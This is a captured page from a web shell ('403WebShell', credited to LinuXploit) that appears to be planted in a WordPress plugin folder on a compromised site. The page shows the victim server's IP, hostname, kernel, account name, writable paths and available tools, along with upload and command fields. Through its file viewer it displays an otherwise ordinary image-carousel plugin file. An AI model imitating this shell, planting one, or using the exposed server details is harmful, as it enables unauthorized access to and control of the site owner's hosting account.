Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.226.169.169
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/misswavenigeria.com/wp-content/plugins/ombre-features/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/misswavenigeria.com/wp-content/plugins/ombre-features/modelslider.php
<?php global $sliderstyle; ?>
<?php $activateauto = get_post_meta( get_the_id(), 'ombrem_activateauto', true ); ?>
<?php $activatecolorbox = get_post_meta( get_the_id(), 'ombrem_activatecolorbox', true ); ?>
<?php $autoplaypause = get_post_meta( get_the_id(), 'ombrem_autoplaypause', true ); ?>
<?php $modelimages = get_post_meta( get_the_id(), 'ombremodelimages', true ); ?>

<?php if (!empty($modelimages)) { ?>
<div id="<?php echo esc_attr($sliderstyle); ?>" class="owl-carousel grid-carousel">
<?php foreach ($modelimages as $image => $link) { ?>
<?php 
    $fullimage = wp_get_attachment_image_src( $image, 'full' );
    if ($sliderstyle == 'model-gallery') {   
        $imageurl = wp_get_attachment_image_src( $image, 'full' );
    }
    else {
        $imageurl = wp_get_attachment_image_src( $image, 'large' );
    }   
    $attachment = get_post($image);
?>    
    <div class="ombre-carousel">
        <?php if ($activatecolorbox == 'on') { ?>
        <a href="<?php echo esc_url($fullimage['0']); ?>" class="o-gallery photo" data-title="<?php echo esc_attr($attachment->post_excerpt); ?>">
        <?php } ?>    
            <img src="<?php echo esc_url($imageurl['0']); ?>" alt="">
            <?php if ($activatecolorbox == 'on') { ?>
        </a>
        <?php } ?>
    </div>
<?php } ?>    
</div>
<script type="text/javascript">
    jQuery("#<?php echo esc_js($sliderstyle); ?>").css('opacity', 0);
    jQuery(window).on('load', function () {
        jQuery("#<?php echo esc_js($sliderstyle); ?>").owlCarousel({
            <?php if (is_rtl()) { echo esc_js("rtl:true,"); } ?>
            items: 1,
            autoplay: <?php if ($activateauto == 'on') { echo esc_js('true'); } else { echo esc_js('false'); } ?>,
            autoplayTimeout: <?php if(!empty($autoplaypause)) { echo esc_js($autoplaypause); } else { echo esc_js('4'); } ?>000,
            autoplayHoverPause: true,
            dots: true,
            autoHeight: true,
            <?php if (!is_rtl()) { ?>
            margin: 100,
            <?php } else { ?>
            margin: 0,
            <?php } ?>
            mouseDrag: false,
            smartSpeed: 800,
            navText: ['', ''],
            nav: false,
            loop: true,
            lazyLoad: false<?php if (!is_rtl()) { ?>,
            animateIn: 'zoomIn',
            animateOut: 'zoomOut'
            <?php } ?>
        });
        jQuery("#<?php echo esc_js($sliderstyle); ?>").css('opacity', 1);
    });
    jQuery(document).ready(function () {
        jQuery("#<?php echo esc_js($sliderstyle); ?> a").colorbox({
            rel: 'photo-gallery',
            title: function () {
                return jQuery(this).data('title');
            },
            maxWidth: '100%',
            maxHeight: '100%'
        });
    });
    </script>
<?php } ?>

Youez - 2016 - github.com/yon3zu
LinuXploit